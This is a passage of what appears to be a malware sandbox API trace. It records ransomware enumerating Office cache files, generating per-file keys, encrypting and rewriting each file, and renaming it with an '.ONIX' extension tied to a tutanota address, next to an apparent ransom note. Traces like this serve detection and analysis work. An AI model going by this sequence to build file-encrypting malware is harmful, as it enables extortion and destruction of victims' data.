CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0097.624] GetProcessHeap () returned 0x410000 [0097.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0097.624] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0097.624] WriteFile (in: hFile=0x398, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0097.626] WriteFile (in: hFile=0x398, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0097.627] WriteFile (in: hFile=0x398, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0097.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1861) returned 0x4b6b68 [0097.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1861) returned 0x4b83d8 [0097.628] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.628] ReadFile (in: hFile=0x398, lpBuffer=0x4b6b68, nNumberOfBytesToRead=0x1861, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6b68*, lpNumberOfBytesRead=0x367f44c*=0x1861, lpOverlapped=0x0) returned 1 [0097.629] SetFilePointer (in: hFile=0x398, lDistanceToMove=-6241, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.629] WriteFile (in: hFile=0x398, lpBuffer=0x4b83d8*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b83d8*, lpNumberOfBytesWritten=0x367f44c*=0x1861, lpOverlapped=0x0) returned 1 [0097.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6b68 | out: hHeap=0x410000) returned 1 [0097.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b83d8 | out: hHeap=0x410000) returned 1 [0097.630] UnlockFile (hFile=0x398, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1861, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0097.630] CloseHandle (hObject=0x398) returned 1 [0097.631] GetProcessHeap () returned 0x410000 [0097.631] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0097.631] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0097.641] GetProcessHeap () returned 0x410000 [0097.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0097.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0097.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0097.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0097.641] FindNextFileW (in: hFindFile=0x48eaf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c1c230, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0097.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0097.641] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.641] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0097.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.641] GetLastError () returned 0x0 [0097.641] FindNextFileW (in: hFindFile=0x48eaf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0097.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0097.641] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.641] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0097.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.641] GetLastError () returned 0x0 [0097.641] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x398 [0097.641] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0097.642] LockFile (hFile=0x398, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x30780dd, nNumberOfBytesToLockHigh=0x0) returned 1 [0097.642] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.642] ReadFile (in: hFile=0x398, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0097.644] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.644] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.645] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0097.645] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0097.645] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", dwFileAttributes=0x80) returned 1 [0097.645] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 75 [0097.645] GetProcessHeap () returned 0x410000 [0097.645] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0097.645] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" [0097.645] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0097.645] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=50823389) returned 1 [0097.645] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x30780dd [0097.645] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0097.645] GetProcessHeap () returned 0x410000 [0097.645] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0097.645] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0097.645] WriteFile (in: hFile=0x398, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0097.648] WriteFile (in: hFile=0x398, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0097.649] WriteFile (in: hFile=0x398, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0097.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30780dd) returned 0x3680020 [0097.651] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30780dd) returned 0x6700020 [0097.652] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.652] ReadFile (in: hFile=0x398, lpBuffer=0x3680020, nNumberOfBytesToRead=0x30780dd, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x30780dd, lpOverlapped=0x0) returned 1 [0100.686] UnlockFile (hFile=0x398, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x30780dd, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0100.686] CloseHandle (hObject=0x398) returned 1 [0100.877] GetProcessHeap () returned 0x410000 [0100.877] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0100.877] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0100.879] GetProcessHeap () returned 0x410000 [0100.879] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0100.879] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0100.879] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0100.879] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0100.879] FindNextFileW (in: hFindFile=0x48eaf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0100.879] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0100.879] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0100.879] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0100.880] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0100.880] GetLastError () returned 0x0 [0100.880] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x398 [0100.880] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0100.880] LockFile (hFile=0x398, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2ab000, nNumberOfBytesToLockHigh=0x0) returned 1 [0100.880] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.880] ReadFile (in: hFile=0x398, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0100.882] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.882] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.882] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0100.882] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0100.882] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", dwFileAttributes=0x80) returned 1 [0100.883] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 76 [0100.883] GetProcessHeap () returned 0x410000 [0100.883] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0100.883] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" [0100.883] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0100.883] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2797568) returned 1 [0100.883] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2ab000 [0100.883] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0100.883] GetProcessHeap () returned 0x410000 [0100.883] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0100.883] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0100.883] WriteFile (in: hFile=0x398, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0100.890] WriteFile (in: hFile=0x398, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0100.891] WriteFile (in: hFile=0x398, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0100.892] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2ab000) returned 0x3680020 [0100.892] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2ab000) returned 0x3930020 [0100.893] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.893] ReadFile (in: hFile=0x398, lpBuffer=0x3680020, nNumberOfBytesToRead=0x2ab000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x2ab000, lpOverlapped=0x0) returned 1 [0101.048] UnlockFile (hFile=0x398, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2ab000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0101.049] CloseHandle (hObject=0x398) returned 1 [0101.050] GetProcessHeap () returned 0x410000 [0101.050] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0101.050] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0101.052] GetProcessHeap () returned 0x410000 [0101.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0101.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0101.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0101.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0101.052] FindNextFileW (in: hFindFile=0x48eaf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1 [0101.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0101.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0101.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0101.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0101.052] GetLastError () returned 0x0 [0101.052] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x398 [0101.053] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0101.053] LockFile (hFile=0x398, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x251f, nNumberOfBytesToLockHigh=0x0) returned 1 [0101.053] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.053] ReadFile (in: hFile=0x398, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0101.054] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.054] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.055] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0101.055] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0101.055] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", dwFileAttributes=0x80) returned 1 [0101.055] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 76 [0101.055] GetProcessHeap () returned 0x410000 [0101.055] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0101.055] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" [0101.055] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0101.055] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=9503) returned 1 [0101.055] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x251f [0101.055] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0101.055] GetProcessHeap () returned 0x410000 [0101.055] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0101.055] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0101.055] WriteFile (in: hFile=0x398, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0101.056] WriteFile (in: hFile=0x398, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0101.057] WriteFile (in: hFile=0x398, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0101.058] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x251f) returned 0x4b6b68 [0101.058] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x251f) returned 0x4b9090 [0101.058] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.058] ReadFile (in: hFile=0x398, lpBuffer=0x4b6b68, nNumberOfBytesToRead=0x251f, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6b68*, 